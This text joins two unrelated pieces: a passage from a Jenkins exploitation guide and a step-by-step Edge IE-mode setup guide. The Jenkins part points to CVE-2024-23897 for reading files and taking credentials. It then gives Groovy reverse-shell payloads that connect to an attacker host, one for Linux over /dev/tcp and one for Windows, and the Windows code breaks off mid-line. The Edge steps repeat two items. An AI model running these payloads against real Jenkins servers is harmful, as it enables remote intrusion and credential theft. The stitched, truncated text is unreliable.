Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
The Internet Explorer 11 desktop application will be retired and go out of support on June 15, 2022. Organizations with websites optimized for Internet Explorer may consider configuring IE mode in Microsoft Edge.
If you are configuring IE mode for an enterprise, you may refer the step by step guide from Microsoft.
To configure IE mode on your windows machine, follow the below steps.
1) Open Microsoft Edge browser
2) Go to Settings
3) Click on Default Browser option
2) Go to Settings
3) Click on Default Browser option
4) On the right pane, you can see "Allow sites to be reloaded in Internet Explorer mode". Toggle the button to ON
5) Restart Edge.
6) Now access any website.
7) To view the website in Internet Explorer Mode, click on Settings > More Tools > Reload in Internet Explorer Mode
8) Now the Website will be reloaded in IE mode. You can also see the settings from IE icon next to the address bar.